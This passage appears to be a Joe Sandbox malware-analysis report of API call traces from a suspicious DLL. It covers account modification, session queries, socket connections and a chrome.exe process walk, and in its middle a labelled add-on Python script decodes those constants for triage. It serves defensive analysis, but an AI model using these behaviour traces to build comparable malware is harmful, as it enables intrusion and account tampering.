                                                            • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                                          • String ID:
                                                          • API String ID: 136543108-0
                                                          • Opcode ID: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                          • Instruction ID: af8d02120cf7308e6d709f2e7e2ecce89aa86b165303e1ddd931105c7dc64684
                                                          • Opcode Fuzzy Hash: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                          • Instruction Fuzzy Hash: B811BF79008B41DFD324DF28C844B9AB7E8EF85620F044B1CF0AA432D1DBB864098B63
                                                          APIs
                                                          • #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                          • #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                          • #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                          • #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #535#537#800#940
                                                          • String ID:
                                                          • API String ID: 1382806170-0
                                                          • Opcode ID: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                          • Instruction ID: 1b94c52f3496be9ecc741279a921140b636ff9e4308d57c3df3fe77fcebb6b55
                                                          • Opcode Fuzzy Hash: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                          • Instruction Fuzzy Hash: E2018B7550C7429FD304DF18C850B9BBBE1EB95764F408A0DF895872A2DB74E84A8B92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #536#537#800#922
                                                          • String ID:
                                                          • API String ID: 1475696894-0
                                                          • Opcode ID: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                          • Instruction ID: 1cf16686c75a57ace72aecc56e9772a672cb7b67628aacae2db0a16f8193c9c6
                                                          • Opcode Fuzzy Hash: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                          • Instruction Fuzzy Hash: 2301B5B6204650AFC304DF58DD01F9AF7E4FB88B14F408A2DF98997781C779A904CB92
                                                          APIs
                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 1002CB6A
                                                          • htons.WS2_32 ref: 1002CB92
                                                          • connect.WS2_32(00000000,?,00000010), ref: 1002CBA5
                                                          • closesocket.WS2_32(00000000), ref: 1002CBB1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: closesocketconnecthtonssocket
                                                          • String ID:
                                                          • API String ID: 3817148366-0
                                                          • Opcode ID: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                          • Instruction ID: e8f6fcb377fdd042e502e5b9bb1bca880f3579ad8180536aff2f54e253c3389a
                                                          • Opcode Fuzzy Hash: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                          • Instruction Fuzzy Hash: E0F0F6385143306BE700EB7C9C8AADBB7E4FF84324F844B49F9A8822E1E27084045786
                                                          APIs
                                                          • WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?), ref: 1002C33C
                                                          • #823.MFC42(00000100,771B1760,00000000,000000FF,00000005,?,?), ref: 1002C34B
                                                          • lstrcpyA.KERNEL32(00000000,?,?), ref: 1002C35B
                                                          • WTSFreeMemory.WTSAPI32(?), ref: 1002C366
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823FreeInformationMemoryQuerySessionlstrcpy
                                                          • String ID:
                                                          • API String ID: 3008764780-0
                                                          • Opcode ID: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                          • Instruction ID: 0e0dc6ce2e22f62c944f194f199933a30fb1a1041a33420a8a3a97c55cf99f31
                                                          • Opcode Fuzzy Hash: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                          • Instruction Fuzzy Hash: F9F0A7B96083116BDB00DB78AC46D9B76E4EB84A11F444A2CF948D2280F574ED08C7F2
                                                          APIs
                                                          • Process32First.KERNEL32(?,00000128), ref: 1000B5B7
                                                          • Process32Next.KERNEL32(?,00000128), ref: 1000B5D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$FirstNext
                                                          • String ID: ???
                                                          • API String ID: 1173892470-1053719742
                                                          • Opcode ID: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                          • Instruction ID: f3f52207799e89cd2a562506939f2cbbbb926e58e4282d7ba594e292c06b3d7f
                                                          • Opcode Fuzzy Hash: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                          • Instruction Fuzzy Hash: CE010432205A040BD728D9399C419AFB7D6EFC43A0F91462DF826C32C4DF78DE08C691
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000D897
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • Sleep.KERNEL32(000003E8), ref: 1000D8A9
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                            • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                            • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                            • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                          • String ID: chrome.exe
                                                          • API String ID: 294463573-2619149582
                                                          • Opcode ID: 0b923ca6a4e2f88d7d96e8bfc8c2d5dd978af23cb480b207e42af5e9afd1fb9c
                                                          • Instruction ID: 3c9e31baa70dc140382364822bbe701dbdbfe9f61172b2a847d5dac191279a67
                                                          • Opcode Fuzzy Hash: 0b923ca6a4e2f88d7d96e8bfc8c2d5dd978af23cb480b207e42af5e9afd1fb9c
                                                          • Instruction Fuzzy Hash: B2117FB80086C19FE324DB64D951BDFB7E0EB95750F404A2DE8A9432C1DF342504CBA3
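                                                           The per-function API listings above are what an analyst actually triages: the NetUserSetInfo call with information level 000003F0, the WTSQuerySessionInformationA call with info class 00000005, the socket/connect pair, and the chrome.exe CString followed by a Toolhelp32 process walk. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses a handful of these call records (copied from this page as constructed sample input) into structured call sites and decodes the constants a practitioner would otherwise look up by hand. The decoders are limited to values I am confident of: 0x3F0 = 1008, i.e. USER_INFO_1008 (account control flags) for NetUserSetInfo; info class 5 = WTSUserName for WTSQuerySessionInformation; socket(2,1,0) = AF_INET/SOCK_STREAM; CreateToolhelp32Snapshot(2) = TH32CS_SNAPPROCESS; WSAStartup(0x202) = Winsock 2.2; and MFC42 ordinal 537 = CString::CString(const char*). The regular expression, the ApiCall type and the function names are my own and not part of the report; arguments the plugin renders as ? are kept as None, and values like 000000FF are deliberately left undecoded rather than guessed.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: call records copied from the function listing on this page,
# in the line format the Joe Sandbox IDA plugin uses ("Part of subcall" lines are nested).
SAMPLE_RECORDS = """\
• mbstowcs.MSVCRT ref: 10025257
• NetUserSetInfo.NETAPI32(00000000,?,000003F0,?,00000000,?,?,?), ref: 1002528E
• Sleep.KERNEL32(00000064,00000000,?,000003F0,?,00000000,?,?,?), ref: 100252B2
  • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
• socket.WS2_32(00000002,00000001,00000000), ref: 1002CB6A
• connect.WS2_32(00000000,?,00000010), ref: 1002CBA5
• WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?), ref: 1002C33C
• #537.MFC42(chrome.exe), ref: 1000D897
  • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
  • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
"""

# One record: optional "Part of subcall function <addr>:", then <api>.<MODULE>(<args>), ref: <addr>.
# The argument list and its parentheses are optional (e.g. "mbstowcs.MSVCRT ref: ...").
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str                 # exported name or MFC ordinal such as "#537"
    module: str              # DLL the plugin resolved the import to
    args: list               # int for 8-hex-digit values, None for "?", str otherwise
    ref: int                 # address of the call site
    parent: Optional[int]    # address of the subcall function, if nested


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok               # string literal argument, e.g. chrome.exe


def parse_calls(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue         # headers such as "APIs" or "Strings" are skipped
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), parent))
    return calls


def decode(call: ApiCall) -> Optional[str]:
    """Explain the constants in a call, or return None when no decoder applies."""
    a = call.args
    if call.api == "NetUserSetInfo" and len(a) > 2 and a[2] == 0x3F0:
        return "NetUserSetInfo level 1008 (USER_INFO_1008: account control flags)"
    if call.api == "WTSQuerySessionInformationA" and len(a) > 2 and a[2] == 5:
        return "WTSQuerySessionInformation WTSUserName (5): user name of the session"
    if call.api == "socket" and a[:2] == [2, 1]:
        return "socket AF_INET/SOCK_STREAM: outbound TCP"
    if call.api == "CreateToolhelp32Snapshot" and a[:1] == [2]:
        return "CreateToolhelp32Snapshot TH32CS_SNAPPROCESS: process enumeration"
    if call.api == "WSAStartup" and a[:1] == [0x202]:
        return "WSAStartup Winsock 2.2"
    if call.api == "Sleep" and a and isinstance(a[0], int):
        return f"Sleep {a[0]} ms"
    if call.module == "MFC42" and call.api == "#537" and a and isinstance(a[0], str):
        return f"CString::CString(const char*) from literal {a[0]!r}"
    return None


def triage(calls: list[ApiCall]) -> list[tuple[int, str]]:
    """(call-site address, decoded meaning) for every call a decoder understands."""
    return [(c.ref, note) for c in calls if (note := decode(c))]


if __name__ == "__main__":
    for ref, note in triage(parse_calls(SAMPLE_RECORDS)):
        print(f"{ref:08X}  {note}")
```

Run it on the whole "APIs" section of a report to get one line per decoded call site; extend decode() only with constants you have verified against the SDK headers, since a wrong decoder is worse than an undecoded argument.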
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000D997
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • Sleep.KERNEL32(000003E8), ref: 1000D9A9
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                            • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                            • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                            • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                          • String ID: chrome.exe
                                                          • API String ID: 294463573-2619149582
                                                          • Opcode ID: a3bf4097e784261b91ddcf7ea40fef9d357ef230353b20bc5f1e0423c08d4705
                                                          • Instruction ID: 6df5605ec276e19eb7803e45be2ef211e296bf8dbfa20a696685d1199e120a8d
                                                          • Opcode Fuzzy Hash: a3bf4097e784261b91ddcf7ea40fef9d357ef230353b20bc5f1e0423c08d4705
                                                          • Instruction Fuzzy Hash: EC117F781086C09BE324DB64DA51BDFB7E0EB95750F404A2DE8A9432C1DF382504CBA3
                                                          APIs
                                                            • Part of subcall function 1002CDD0: Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                            • Part of subcall function 1002CDD0: wsprintfA.USER32 ref: 1002CE0C
                                                            • Part of subcall function 1002CDD0: closesocket.WS2_32(00000000), ref: 1002CE24
                                                            • Part of subcall function 1002CDD0: TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                            • Part of subcall function 1002CDD0: CloseHandle.KERNEL32(1012E1E4), ref: 1002CE63
                                                          • gethostbyname.WS2_32(1012B938), ref: 10024678
                                                          • inet_ntoa.WS2_32(?), ref: 1002469B
                                                            • Part of subcall function 1002CC90: _snprintf.MSVCRT ref: 1002CCCF
                                                            • Part of subcall function 1002CC90: recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                            • Part of subcall function 1002CC90: CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                            • Part of subcall function 1002CC90: CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                            • Part of subcall function 1002CC90: closesocket.WS2_32(00000000), ref: 1002CDB1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleThreadclosesocket$CreateSleepTerminate_snprintfgethostbynameinet_ntoarecvwsprintf
                                                          • String ID: 127.0.0.1
                                                          • API String ID: 4129115345-3619153832
                                                          • Opcode ID: 482842914eaffcd2ab54d6bed2b60c42a75b80031d3a10fdf504d639132e7dad
                                                          • Instruction ID: cd5f09b4395b623b83a3aabc3bfd33f5180e181e21a3f489f49100e2e3f4e5ff
                                                          • Opcode Fuzzy Hash: 482842914eaffcd2ab54d6bed2b60c42a75b80031d3a10fdf504d639132e7dad
                                                          • Instruction Fuzzy Hash: BCE0ED7A2106109BC214DBA8E884DEB77E5FBDC710B04855DF94AD7211C6347841C761
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001C8E
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001CA4
                                                          • memmove.MSVCRT(?,?,00000000,?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000), ref: 10001CF5
                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001D1B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
